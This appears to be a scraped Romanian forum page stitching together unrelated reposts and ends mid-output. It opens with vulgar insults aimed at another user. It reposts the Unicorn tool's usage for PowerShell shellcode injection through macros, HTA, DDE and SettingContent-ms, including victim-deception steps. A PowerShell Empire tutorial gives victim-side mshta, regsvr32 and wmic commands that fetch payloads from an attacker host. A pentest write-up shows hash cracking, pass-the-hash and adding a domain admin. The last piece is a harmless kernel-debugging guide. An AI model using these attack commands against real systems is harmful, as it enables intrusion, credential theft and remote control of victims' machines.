Leaderboard

Ai reusit sa faci pe rasa ma-tii de noob, macar reclama de ti-ai face-o intr-un mod inteligent. O sa-ti cumpere pulea cursul, probabil e ciordit sau se regaseste pe net. auzi si tu, acces la grup facebook; suport tel, 2 teme nulled, consultanta in alegerea unui dildo... fgm de infect Pe ma-ta nu o dai bonus ?

unicorn Written by: Dave Kennedy (@HackingDave) Website: https://www.trustedsec.com Magic Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18. Usage is simple, just run Magic Unicorn (ensure Metasploit is installed if using Metasploit methods and in the right path) and magic unicorn will automatically generate a powershell command that you need to simply cut and paste the powershell code into a command line window or through a payload delivery system. Unicorn supports your own shellcode, cobalt strike, and Metasploit. root@rel1k:~/Desktop# python unicorn.py ,/ // ,// ___ /| |// `__/\_ --(/|___/-/ \|\_-\___ __-_`- /-/ \. |\_-___,-\_____--/_)' ) \ \ -_ / __ \( `( __`\| `\__| |\)\ ) /(/| ,._____., ',--//-| \ | ' / / __. \, / /,---| \ / / / _. \ \ `/`_/ _,' | | | | ( ( \ | ,/\'__/'/ | | | \ \`--, `_/_------______/ \( )/ | | \ \_. \, \___/\ | | \_ \ \ \ \ \ \_ \ \ / \ \ \ \._ \__ \_| | \ \ \___ \ \ | \ \__ \__ \ \_ | \ | | \_____ \ ____ | | | \ \__ ---' .__\ | | | \ \__ --- / ) | \ / \ \____/ / ()( \ `---_ /| \__________/(,--__ \_________. | ./ | | \ \ `---_\--, \ \_,./ | | \ \_ ` \ /`---_______-\ \\ / \ \.___,`| / \ \\ \ \ | \_ \| \ ( |: | \ \ \ | / / | ; \ \ \ \ ( `_' \ | \. \ \. \ `__/ | | \ \ \. \ | | \ \ \ \ ( ) \ | \ | | | | \ \ \ I ` ( __; ( _; ('-_'; |___\ \___: \___: aHR0cHM6Ly93d3cuYmluYXJ5ZGVmZW5zZS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMTcvMDUvS2VlcE1hdHRIYXBweS5qcGc= -------------------- Magic Unicorn Attack Vector ----------------------------- Native x86 powershell injection attacks on any Windows platform. Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com) Twitter: @TrustedSec, @HackingDave Credits: Matthew Graeber, Justin Elze, Chris Gates Happy Magic Unicorns. Usage: python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt> PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro Macro Example CS: python unicorn.py <cobalt_strike_file.cs> cs macro Macro Example Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode macro HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta HTA Example CS: python unicorn.py <cobalt_strike_file.cs> cs hta HTA Example Shellcode: python unicorn.py <path_to_shellcode.txt>: shellcode hta DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde CRT Example: python unicorn.py <path_to_payload/exe_encode> crt Custom PS1 Example: python unicorn.py <path to ps1 file> Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500 Cobalt Strike Example: python unicorn.py <cobalt_strike_file.cs> cs (export CS in C# format) Custom Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode (formatted 0x00) Help Menu: python unicorn.py --help -----POWERSHELL ATTACK INSTRUCTIONS---- Everything is now generated in two files, powershell_attack.txt and unicorn.rc. The text file contains all of the code needed in order to inject the powershell attack into memory. Note you will need a place that supports remote command injection of some sort. Often times this could be through an excel/word doc or through psexec_commands inside of Metasploit, SQLi, etc.. There are so many implications and scenarios to where you can use this attack at. Simply paste the powershell_attack.txt command in any command prompt window or where you have the ability to call the powershell executable and it will give a shell back to you. This attack also supports windows/download_exec for a payload method instead of just Meterpreter payloads. When using the download and exec, simply put python unicorn.py windows/download_exec url=https://www.thisisnotarealsite.com/payload.exe and the powershell code will download the payload and execute. Note that you will need to have a listener enabled in order to capture the attack. -----MACRO ATTACK INSTRUCTIONS---- For the macro attack, you will need to go to File, Properties, Ribbons, and select Developer. Once you do that, you will have a developer tab. Create a new macro, call it Auto_Open and paste the generated code into that. This will automatically run. Note that a message will prompt to the user saying that the file is corrupt and automatically close the excel document. THIS IS NORMAL BEHAVIOR! This is tricking the victim to thinking the excel document is corrupted. You should get a shell through powershell injection after that. If you are deploying this against Office365/2016+ versions of Word you need to modify the first line of the output from: Sub Auto_Open() To: Sub AutoOpen() The name of the macro itself must also be "AutoOpen" instead of the legacy "Auto_Open" naming scheme. NOTE: WHEN COPYING AND PASTING THE EXCEL, IF THERE ARE ADDITIONAL SPACES THAT ARE ADDED YOU NEED TO REMOVE THESE AFTER EACH OF THE POWERSHELL CODE SECTIONS UNDER VARIABLE "x" OR A SYNTAX ERROR WILL HAPPEN! -----HTA ATTACK INSTRUCTIONS---- The HTA attack will automatically generate two files, the first the index.html which tells the browser to use Launcher.hta which contains the malicious powershell injection code. All files are exported to the hta_access/ folder and there will be three main files. The first is index.html, second Launcher.hta and the last, the unicorn.rc file. You can run msfconsole -r unicorn.rc to launch the listener for Metasploit. A user must click allow and accept when using the HTA attack in order for the powershell injection to work properly. -----CERUTIL Attack Instruction---- The certutil attack vector was identified by Matthew Graeber (@mattifestation) which allows you to take a binary file, move it into a base64 format and use certutil on the victim machine to convert it back to a binary for you. This should work on virtually any system and allow you to transfer a binary to the victim machine through a fake certificate file. To use this attack, simply place an executable in the path of unicorn and run python unicorn.py <exe_name> crt in order to get the base64 output. Once that's finished, go to decode_attack/ folder which contains the files. The bat file is a command that can be run in a windows machine to convert it back to a binary. -----Custom PS1 Attack Instructions---- This attack method allows you to convert any PowerShell file (.ps1) into an encoded command or macro. Note if choosing the macro option, a large ps1 file may exceed the amount of carriage returns allowed by VBA. You may change the number of characters in each VBA string by passing an integer as a parameter. Examples: python unicorn.py harmless.ps1 python unicorn.py myfile.ps1 macro python unicorn.py muahahaha.ps1 macro 500 The last one will use a 500 character string instead of the default 380, resulting in less carriage returns in VBA. -----DDE Office COM Attack Instructions---- This attack vector will generate the DDEAUTO formulate to place into Word or Excel. The COM object DDEInitilize and DDEExecute allow for formulas to be created directly within Office which causes the ability to gain remote code execution without the need of macros. This attack was documented and full instructions can be found at: https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/ In order to use this attack, run the following examples: python unicorn.py dde python unicorn.py windows/meterpreter/reverse_https 192.168.5.5 443 dde Once generated, a powershell_attack.txt will be generated which contains the Office code, and the unicorn.rc file which is the listener component which can be called by msfconsole -r unicorn.rc to handle the listener for the payload. In addition a download.ps1 will be exported as well (explained in the latter section). In order to apply the payload, as an example (from sensepost article): Open Word Insert tab -> Quick Parts -> Field Choose = (Formula) and click ok. Once the field is inserted, you should now see "!Unexpected End of Formula" Right-click the Field, choose "Toggle Field Codes" Paste in the code from Unicorn Save the Word document. Once the office document is opened, you should receive a shell through powershell injection. Note that DDE is limited on char size and we need to use Invoke-Expression (IEX) as the method to download. The DDE attack will attempt to download download.ps1 which is our powershell injection attack since we are limited to size restrictions. You will need to move the download.ps1 to a location that is accessible by the victim machine. This means that you need to host the download.ps1 in an Apache2 directory that it has access to. You may notice that some of the commands use "{ QUOTE" these are ways of masking specific commands which is documented here: http://staaldraad.github.io/2017/10/23/msword-field-codes/. In this case we are changing WindowsPowerShell, powershell.exe, and IEX to avoid detection. Also check out the URL as it has some great methods for not calling DDE at all. -----Import Cobalt Strike Beacon---- This method will import direct Cobalt Strike Beacon shellcode directly from Cobalt Strike. Within Cobalt Strike, export the Cobalt Strike "CS" (C#) export and save it to a file. For example, call the file, cobalt_strike_file.cs. The export code will look something like this: length: 836 bytes */ byte[] buf = new byte[836] { 0xfc, etc Next, for usage: python unicorn.py cobalt_strike_file.cs cs The cs argument tells Unicorn that you want to use the Cobalt strike functionality. The rest is Magic. Next simply copy the powershell command to something you have the ability for remote command execution. NOTE: THE FILE MUST BE EXPORTED IN THE C# (CS) FORMAT WITHIN COBALT STRIKE TO PARSE PROPERLY. There are some caveats with this attack. Note that the payload size will be a little over 14k+ in byte size. That means that from a command line argument perspective if you copy and paste you will hit the 8191 character size restriction (hardcoded into cmd.exe). If you are launching directly from cmd.exe this is an issue, however if you are launching directly from PowerShell or other normal applications this is a non-problem. A couple examples here, wscript.shell and powershell uses USHORT - 65535 / 2 = 32767 size limit: typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING; For this attack if you are launching directly from powershell, VBSCript (WSCRIPT.SHELL), there is no issues. -----Custom Shellcode Generation Method---- This method will allow you to insert your own shellcode into the Unicorn attack. The PowerShell code will increase the stack side of the powershell.exe (through VirtualAlloc) and inject it into memory. Note that in order for this to work, your txt file that you point Unicorn to must be formatted in the following format or it will not work: 0x00,0x00,0x00 and so on. Also note that there is size restrictions. The total length size of the PowerShell command cannot exceed the size of 8191. This is the max command line argument size limit in Windows. Usage: python uniocrn.py shellcode_formatted_properly.txt shellcode Next simply copy the powershell command to something you have the ability for remote command execution. NOTE: THE FILE MUST PROPERLY BE FORMATTED IN A 0x00,0x00,0x00 TYPE FORMAT WITH NOTHING ELSE OTHER THAN YOUR SHELLCODE IN THE TXT FILE. There are some caveats with this attack. Note that if your payload size is large in nature it will not fit in cmd.exe. That means that from a command line argument perspective if you copy and paste you will hit the 8191 character size restriction (hardcoded into cmd.exe). If you are launching directly from cmd.exe this is an issue, however if you are launching directly from PowerShell or other normal applications this is a non-problem. A couple examples here, wscript.shell and powershell uses USHORT - 65535 / 2 = 32767 size limit: typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING; For this attack if you are launching directly from powershell, VBSCript (WSCRIPT.SHELL), there is no issues. -----SettingContent-ms Extension Method---- First, if you haven't had a chance, head over to the awesome SpectreOps blog from Matt Nelson (enigma0x3): https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39 This method uses a specific file type called ".SettingContent-ms" which allows for the ability for both direct loads from browsers (open + command execution) as well as extension type through embedding in office products. This one specifically will focus on extension type settings for command execution within Unicorn's PowerShell attack vector. There are multiple methods supported with this attack vector. Since there is a limited character size with this attack, the method for deployment is an HTA. For a detailed understanding on weaponizing this attack visit: https://www.trustedsec.com/2018/06/weaponizing-settingcontent/ The steps you'll need to do to complete this attack is generate your .SettingContent-ms file from either a standalone or hta. The HTA method supports Metasploit, Cobalt Strike, and direct shellcode attacks. The four methods below on usage: HTA SettingContent-ms Metasploit: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 ms HTA Example SettingContent-ms: python unicorn.py <cobalt_strike_file.cs cs ms HTA Example SettingContent-ms: python unicorn.py <patth_to_shellcode.txt>: shellcode ms Generate .SettingContent-ms: python unicorn.py ms The first is a Metasploit payload, the second a Cobalt Strike, the third your own shellcode, and the fourth just a blank .SettingContent-ms file. When everything is generated, it will export a file called Standalone_NoASR.SettingContent-ms either in the default root Unicorn directory (if using the standalone file generation) or under the hta_attack/ folder. You will need to edit the Standalone_NoASR.SettingContent-ms file and replace: REPLACECOOLSTUFFHERE With: mshta http://<apache_server_ip_or_dns_name/Launcher.hta. Then move the contents of the hta_attack to /var/www/html. Once the victim either clicks the .SettingContent-ms file, mshta will be called on the victim machine then download the Unicorn HTA file which has the code execution capabilites. Special thanks and kudos to Matt Nelson for the awesome research Also check out: https://www.trustedsec.com/2018/06/weaponizing-settingcontent/ Usage: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 ms python unicorn.py <cobalt_strike_file.cs cs ms python unicorn.py <patth_to_shellcode.txt>: shellcode ms python unicorn.py ms Sursa: https://github.com/trustedsec/unicorn

Multiple Ways to Exploiting Windows PC using PowerShell Empire posted in Penetration Testing on February 4, 2019 by Raj Chandel SHARE This is our second post in the article series ‘PowerShell Empire’. In this article we will cover all the exploits that leads to windows exploitation with empire. To our first post on empire series, which gives a basic guide to navigate your way through empire, click here. Table of content: Exploiting through HTA Exploiting through MSBuild.exe Exploiting through regsvr32 XSL exploit Exploiting through visual basic script BAT exploit Multi_launcher exploit Exploiting through HTA This attack helps us to exploit windows through .hta. when .hta file is run via mshta.exe it executes as .exe file with similar functionality which lets us hack our way through. To know more about this attack please click here. To run type ‘./Empire’. According to the work flow, firstly, we have to create a listener to listen on our local machine. Type the following command: listeners 1 listeners After running the above command, it will say that “no listeners are currently active” but don’t worry, we are into the listener interface now. So in this listener interface, type : uselistener http set Host http://192.168.1.107 execute 1 2 3 uselistener http set Host http://192.168.1.107 execute Now that a listener is created, type ‘back’ to go in listener interface to create an exploit. For this, type : usestager windows/hta set Listener http set OutFile /root/1.hta execute 1 2 3 4 usestager windows/hta set Listener http set OutFile /root/1.hta execute Running the above commands will create an .hta file to be used as malware. Start the python server using the following command, in order to share our .hta file: python -m SimpleHTTPServer 8080 1 python -m SimpleHTTPServer 8080 As the python server is up and running, type the following command in victims’ command prompt to execute our malicious file: mshta.exe http:/192.168.1.107:8080/1.hta 1 mshta.exe http:/192.168.1.107:8080/1.hta The moment above command is executed you will have your session, to access the session type : interact XDGM6HLE sysinfo 1 2 interact XDGM6HLE sysinfo Exploiting through MSBuild.exe Our next exploit is via MSBuild.exe, which will let you have a remote session of windows using XML file. To know in details about this attack please click here. And to use this exploit type: listeners uselistener http set Host http:/192.168.1.107 execute 1 2 3 4 listeners uselistener http set Host http:/192.168.1.107 execute This creates a listener, type ‘back’ to go in listener interface to create a exploit. For this, type : usestager windows/launcher_xml set Listener http execute 1 2 3 usestager windows/launcher_xml set Listener http execute Now, an .xml file is created in /tmp. Copy this file in victims’ PC (inside Microsoft.NET\Framework\v4.0.30319\) and run it typing combination of following commands: cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\ MSBuild.exe launcher.xml 1 2 cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\ MSBuild.exe launcher.xml So, this way you will have your session, to access the said session type : interact A8H14C7L sysinfo 1 2 interact A8H14C7L sysinfo Exploiting through regsvr32 Our next method is exploiting through regsvr32. To know in detail about this attack, do click here. As always, we have to create a listener first to listen on our local machine. Type the following command: listeners uselistener http set Host http://192.168.1.107 execute 1 2 3 4 listeners uselistener http set Host http://192.168.1.107 execute Now that a listener is created, type ‘back’ to go in listener interface to create an exploit. For this, type: usestager windows/launcher_sct set Listener http execute 1 2 3 usestager windows/launcher_sct set Listener http execute This will create a .sct file in /tmp. Share this file to victim’s PC using python server and then run this file in run window of victims’ PC by typing the following command: regsvr /u /n /s /i:http://192.168.1.107:8080/launcher.sct scrobj.dll 1 regsvr /u /n /s /i:http://192.168.1.107:8080/launcher.sct scrobj.dll Thus, you will have an active session. To access the session type: interact <session name> sysinfo 1 2 interact <session name> sysinfo Exploiting through XSL XSL is a language will helps you format data, this also describes how web server will interact with using XML. Our next method of attack with empire is by exploiting .xsl file. For this method lets activate our listener first by typing : listeners uselistener http set Host http://192.168.1.107 execute 1 2 3 4 listeners uselistener http set Host http://192.168.1.107 execute As the listener is up and running, create your exploit : usestager windows/launcher_xsl set Listener http execute 1 2 3 usestager windows/launcher_xsl set Listener http execute This way .xsl file is created. Now run the python server from the folder where the .xsl file is created as shown in the image below : cd /tmp python -m SimpleHTTPServer 8080 1 2 cd /tmp python -m SimpleHTTPServer 8080 Now execute the following command in the command prompt of your victim: wmic process get brief /format:"http://192.168.1.107:8080/launcher.xsl" 1 wmic process get brief /format:"http://192.168.1.107:8080/launcher.xsl" Running above will give a session, to access the session type : interact <session name> sysinfo 1 2 interact <session name> sysinfo Exploiting through Visual Basic script Our next method is to create a malicious VBS file and exploiting our victim through it. Like always, let’s create a listener first. listeners uselistener http set Host http://192.168.1.107 execute 1 2 3 4 listeners uselistener http set Host http://192.168.1.107 execute Now, to create our malicious .vbs file type : usestager windows/launcher_vbs set Listener http execute 1 2 3 usestager windows/launcher_vbs set Listener http execute Next step is to start the python server by typing: python -m SimpleHTTPServer 8080 1 python -m SimpleHTTPServer 8080 Once the .vbs file is shared through python server and executed in the victim’s PC you will have you r session and just like before to access the session type : interact <session name> sysinfo 1 2 interact <session name> sysinfo Exploiting through .bat In this method, we will exploit through .bat file. Like our previous exploits, this time too, let’s create a listener. For this, type: listeners uselistener http set Host http://192.168.1.107 execute back 1 2 3 4 5 listeners uselistener http set Host http://192.168.1.107 execute back The above commands will create a listener for you. Let’s create our .bat file using following command : usestager windows/launcher_bat use Listener http set OutFile /root/1.bat execute 1 2 3 4 usestager windows/launcher_bat use Listener http set OutFile /root/1.bat execute As shown, the above commands will create a .bat file. Start up the python server by using following command to allow you share you .bat file on your victim’s pc. python -m SimpleHTTPServer 8080 1 python -m SimpleHTTPServer 8080 Once you run the .bat file, a session will activate. To access the session type: interact <session name> sysinfo 1 2 interact <session name> sysinfo Multi_launcher This is our last method of this post. It can be used on various platforms such as windows, linux, etc. again, even for this method, create a listener: listerners uselistener http set Host http://192.168.1.107 execute 1 2 3 4 listerners uselistener http set Host http://192.168.1.107 execute Then type following commands for create your malicious file: usestager multi/launcher set listerner http execute 1 2 3 usestager multi/launcher set listerner http execute Once you hit enter after the above commands, it will give you a code. Copy this code and paste it in the command prompt of victim and hit enter. As soon as you hit enter, you will have activated a session. To access the session, type: interact <session name> sysinfo 1 2 interact <session name> sysinfo Conclusion The above were the methods that you can use to exploit windows using different vulnerabilities. Using this framework is an addition to your pentesting skills after Metasploit. Enjoy! Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here ABOUT THE AUTHOR Raj Chandel Raj Chandel is a Skilled and Passionate IT Professional especially in IT-Hacking Industry. At present other than his name he can also be called as An Ethical Hacker, A Cyber Security Expert, A Penetration Tester. With years of quality Experience in IT and software industry Sursa: https://www.hackingarticles.in/multiple-ways-to-exploiting-windows-pc-using-powershell-empire/

Școala pentru Ban !

mai nasol daca erau cacareze mici si negre, alea au criptare avansata! Mergand pe ideea ca ai uitat ce ai pus la bilutele negre, cel mai simplu este sa resetezi camera si o reconfigurezi. mult mai simplu decat sa faci pe hackerul

ii dati prea multa atentie, asta trebuie ignorat...

Gaining Domain Admin from Outside Active Directory Mar 4, 2018 …or why you should ensure all Windows machines are domain joined. This is my first non-web post on my blog. I’m traditionally a web developer, and that is where my first interest in infosec came from. However, since I have managed to branch into penetration testing, initially part time and now full time, Active Directory testing has become my favourite type of penetration test. This post is regarding an internal network test for a client I did earlier in the year. This client’s network is a tough nut to crack, and one I’ve tested before so I was kind of apprehensive of going back to do this test for them in case I came away without having “hacked in”. We had only just managed it the previous time. The first thing I run on an internal is the Responder tool. This will grab Windows hashes from LLMNR or NetBIOS requests on the local subnet. However, this client was wise to this and had LLMNR & NetBIOS requests disabled. Despite already knowing this fact from the previous engagement, one of the things I learned during my OSCP course was to always try the easy things first - there’s no point in breaking in through a skylight if the front door is open. So I ran Responder, and I was surprised to see the following hash captured: Note of course, that I would never reveal client confidential information on my blog, therefore everything you see here is anonymised and recreated in the lab with details changed. Here we can see the host 172.16.157.133 has sent us the NETNTLMv2 hash for the account FRONTDESK. Checking this host’s NetBIOS information with Crack Map Exec (other tools are available), we can check whether this is a local account hash. If it is, the “domain” part of the username: [SMBv2] NTLMv2-SSP Username : 2-FD-87622\FRONTDESK i.e. 2-FD-87622 should match the host’s NetBIOS name if this is the case. Looking up the IP with CME we can see the name of the host matches: So the next port of call we try to crack this hash and gain the plaintext password. Hashcat was loaded against rockyou.txt and rules, and quickly cracked the password. hashcat -m 5600 responder /usr/share/wordlists/rockyou.txt -r /usr/share/rules/d3adhob0.rule Now we have a set of credentials for the front desk machine. Hitting the machine again with CME but this time passing the cracked credentials: cme smb 172.16.157.133 -u FRONTDESK -p 'Winter2018!' --local-auth We can see Pwn3d! in the output showing us this is a local administrator account. This means we have the privileges required to dump the local password hashes: cme smb 172.16.157.133 -u FRONTDESK -p 'Winter2018!' --local-auth --sam Note we can see FRONTDESK:1002:aad3b435b51404eeaad3b435b51404ee:eb6538aa406cfad09403d3bb1f94785f::: This time we are seeing the NTLM hash of the password, rather than the NETNTLMv2 “challenge/response” hash that Responder caught earlier. Responder catches hashes over the wire, and these are different to the format that Windows stores in the SAM. The next step was to try the local administrator hash and spray it against the client’s server range. Note that we don’t even have to crack this administrator password, we can simply “pass-the-hash”: cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-auth We can only pass-the-hash using the stored NTLM format, not the NETNTLMv2 network format (unless you look to execute an “SMB relay” attack instead). To our surprise, it got a hit, the local administrator password had been reused on the STEWIE machine. Querying this host’s NetBIOS info: $ cme smb 172.16.157.134 SMB 172.16.157.134 445 STEWIE [*] Windows Server 2008 R2 Foundation 7600 x64 (name:STEWIE) (domain:MACFARLANE) (signing:False) (SMBv1:True) We can see it is a member of the MACFARLANE domain, the main domain of the client’s Active Directory. So the non-domain machine had a local administrator password which was reused on the internal servers. We can now use Metasploit to PsExec onto the machine, using the NTLM as the password which will cause Metasploit to pass-the-hash. Once ran, our shell is gained: We can load the Mimikatz module and read Windows memory to find passwords: Looks like we have the DA (Domain Admin) account details. And to finish off, we use CME to execute commands on the Domain Controller to add ourselves as a DA (purely for a POC for our pentest, in real life or to remain more stealthy we could just use the discovered account). cme smb 172.16.157.135 -u administrator -p 'October17' -x 'net user markitzeroda hackersPassword! /add /domain /y && net group "domain admins" markitzeroda /add' Note the use of the undocumented /y function to suppress the prompt Windows gives you for adding a password longer than 14 characters. A screenshot of Remote Desktop to the Domain Controller can go into the report as proof of exploitation: So if this front desk machine had been joined to the domain, it would have had LLMNR disabled (from their Group Policy setting) and we wouldn’t have gained the initial access to it and leveraged its secrets in order to compromise the whole domain. Of course there are other mitigations such as using LAPS to manage local administrator passwords and setting FilterAdministratorToken to prevent SMB logins using the local RID 500 account (great post on this here). Sursa: https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html

Single-stepping through the Kernel Feb 3, 2019 tech linux kernel There may come a time in a system programmer’s life where she needs to leave the civilized safety of the userland and confront the unspeakable horrors that dwell in the depths of the Kernel space. While higher beings might pour scorn on the very idea of a Kernel debugger, us lesser mortals may have no other recourse but to single-step through Kernel code when the rivers begin to run dry. This guide will help you do just that. We hope you never actually have to. Ominous sounding intro-bait notwithstanding, setting up a virtual machine for Kernel debugging isn’t really that difficult. It only needs a bit of preparation. If you just want a copypasta, skip to the end. If you’re interested in the predicaments involved and how to deal with them, read on. N.B.: “But which kernel are you talking about?”, some heathens may invariably ask when it is obvious that Kernel with a capital K refers to the One True Kernel. Building the Kernel Using a minimal Kernel configuration instead of the kitchen-sink one that distributions usually ship will make life a lot easier. You will first need to grab the source code for the Kernel you are interested in. We will use the latest Kernel release tarball from kernel.org, which at the time of writing is 4.20.6. Inside the extracted source directory, invoke the following: make defconfig make kvmconfig make -j4 This will build a minimal Kernel image that can be booted in QEMU like so: qemu-system-x86_64 -kernel linux-4.20.6/arch/x86/boot/bzImage This should bring up an ancient-looking window with a cryptic error message: You could try pasting the error message into Google a search engine: Except for the fact that you can’t select the text in the window. And frankly, the window just looks annoying! So, ignoring the actual error for a moment, let’s try to get QEMU to print to the console instead of a spawning a new graphical window: qemu-system-x86_64 -kernel -nographic linux-4.20.6/arch/x86/boot/bzImage QEMU spits out a single line: qemu-system-x86_64: warning: TCG doesn't support requested feature: CPUID.01H:ECX.vmx [bit 5] Htop tells me QEMU is using 100% of a CPU and my laptop fan agrees. But there is no output whatsoever and Ctrl-c doesn’t work! What does work, however, is pressing Ctrl-a and then hitting x: QEMU: Terminated Turns out that by passing -nographic, we have plugged out QEMU’s virtual monitor. Now, to actually see any output, we need to tell the Kernel to write to a serial port: qemu-system-x86_64 -nographic -kernel linux-4.20.6/arch/x86/boot/bzImage -append "console=ttyS0" It worked! Now we can read error message in all its glory: [ 1.333008] VFS: Cannot open root device "(null)" or unknown-block(0,0): error -6 [ 1.334024] Please append a correct "root=" boot option; here are the available partitions: [ 1.335152] 0b00 1048575 sr0 [ 1.335153] driver: sr [ 1.335996] Kernel panic - not syncing: VFS: Unable to mount root fs on unknown-block(0,0) [ 1.337104] CPU: 0 PID: 1 Comm: swapper/0 Not tainted 4.20.6 #1 [ 1.337901] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1ubuntu1 04/01/2014 [ 1.339091] Call Trace: [ 1.339437] dump_stack+0x46/0x5b [ 1.339888] panic+0xf3/0x248 [ 1.340295] mount_block_root+0x184/0x248 [ 1.340838] ? set_debug_rodata+0xc/0xc [ 1.341357] mount_root+0x121/0x13f [ 1.341837] prepare_namespace+0x130/0x166 [ 1.342378] kernel_init_freeable+0x1ed/0x1ff [ 1.342965] ? rest_init+0xb0/0xb0 [ 1.343427] kernel_init+0x5/0x100 [ 1.343888] ret_from_fork+0x35/0x40 [ 1.344526] Kernel Offset: 0x1200000 from 0xffffffff81000000 (relocation range: 0xffffffff80000000-0xffffffffbfffffff) [ 1.345956] ---[ end Kernel panic - not syncing: VFS: Unable to mount root fs on unknown-block(0,0) ]--- So, the Kernel didn’t find a root filesystem to kick off the user mode and panicked. Lets fix that by creating a root filesystem image. Creating a Root Filesystem Start by creating an empty image: qemu-img create rootfs.img 1G And then format it as ext4 and mount it: mkfs.ext4 rootfs.img mkdir mnt sudo mount -o loop rootfs.img mnt/ Now we can populate it using debootstrap: sudo debootstrap bionic mnt/ This will create a root filesystem based on Ubuntu 18.04 Bionic Beaver. Of course, feel free to replace bionic with any release that you prefer. And unmount the filesystem once we’re done. This is important if you want to avoid corrupted images! sudo umount mnt Now boot the Kernel with our filesystem. We need to tell QEMU to use our image as a virtual hard drive and we also need to tell the Kernel to use the hard drive as the root filesystem: qemu-system-x86_64 -nographic -kernel linux-4.20.6/arch/x86/boot/bzImage -hda rootfs.img -append "root=/dev/sda console=ttyS0" This time the Kernel shouldn’t panic and you should eventually see a login prompt. We could have setup a user while creating the filesystem but it’s annoying to have to login each time we boot up the VM. Let’s enable auto login as root instead. Terminate QEMU (Ctrl-c, x), mount the filesystem image again and then create the configuration folder structure: sudo mount -o loop rootfs.img mnt/ sudo mkdir -p mnt/etc/systemd/system/serial-getty@ttyS0.service.d Add the following lines to mnt/etc/systemd/system/serial-getty@ttyS0.service.d/autologin.conf: [Service] ExecStart= ExecStart=-/sbin/agetty --noissue --autologin root %I $TERM Type=idle Make sure to unmount the filesystem and then boot the Kernel again. This time you should be automatically logged in. Gracefully shutdown the VM: halt -p Attaching a debugger Let’s rebuild the Kernel with debugging symbols enabled: ./scripts/config -e CONFIG_DEBUG_INFO make -j4 Now, boot the Kernel again, this time passing the -s flag which will make QEMU listen on TCP port 1234: qemu-system-x86_64 -nographic -kernel linux-4.20.6/arch/x86/boot/bzImage -hda rootfs.img -append "root=/dev/sda console=ttyS0" -s Now, in another terminal start gdb and attach to QEMU: gdb ./linux-4.20.6/vmlinux ... Reading symbols from ./linux-4.20.6/vmlinux...done. (gdb) target remote :1234 Remote debugging using :1234 0xffffffff95a2f8f4 in ?? () (gdb) You can set a breakpoint on Kernel function, for instance do_sys_open(): (gdb) b do_sys_open Breakpoint 1 at 0xffffffff811b2720: file fs/open.c, line 1049. (gdb) c Continuing. Now try opening a file in VM which should result in do_sys_open() getting invoked… And nothing happens?! The breakpoint in gdb is not hit. This due to a Kernel security feature called KASLR. KASLR can be disabled at boot time by adding nokaslr to the Kernel command line arguments. But, let’s actually rebuild the Kernel without KASLR. While we are at it, let’s also disable loadable module support as well which will save us the trouble of copying the modules to the filesystem. ./scripts/config -e CONFIG_DEBUG_INFO -d CONFIG_RANDOMIZE_BASE -d CONFIG_MODULES make olddefconfig # Resolve dependencies make -j4 Reboot the Kernel again, attach gdb, set a breakpoint on do_sys_open() and run cat /etc/issue in the guest. This time the breakpoint should be hit. But probably not where you expected: Breakpoint 1, do_sys_open (dfd=-100, filename=0x7f96074ad428 "/etc/ld.so.cache", flags=557056, mode=0) at fs/open.c:1049 1049 { (gdb) c Continuing. Breakpoint 1, do_sys_open (dfd=-100, filename=0x7f96076b5dd0 "/lib/x86_64-linux-gnu/libc.so.6", flags=557056, mode=0) at fs/open.c:1049 1049 { (gdb) c Continuing. Breakpoint 1, do_sys_open (dfd=-100, filename=0x7ffe9e630e8e "/etc/issue", flags=32768, mode=0) at fs/open.c:1049 1049 { (gdb) Congratulations! From this point, you can single-step away to your heart’s content. By default, the root filesystem is mounted read only. If you want to be able to write to it, add rw after root=/dev/sda in the Kernel parameters: qemu-system-x86_64 -nographic -kernel linux-4.20.6/arch/x86/boot/bzImage -hda rootfs.img -append "root=/dev/sda rw console=ttyS0" -s Bonus: Networking You can create a point to point link between the QEMU VM and the host using a TAP interface. First install tunctl and create a persistent TAP interface to avoid running QEMU as root: sudo apt install uml-utilities sudo sudo tunctl -u $(id -u) Set 'tap0' persistent and owned by uid 1000 sudo ip link set tap0 up Now launch QEMU with a virtual e1000 virtual interface connected the host’s tap0 interface: qemu-system-x86_64 -nographic -device e1000,netdev=net0 -netdev tap,id=net0,ifname=tap0 -kernel linux-4.20.6/arch/x86/boot/bzImage -hda rootfs.img -append "root=/dev/sda rw console=ttyS0" -s Once the guest boots up, bring the network interface up: ip link set enp0s3 up ip a 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: enp0s3: 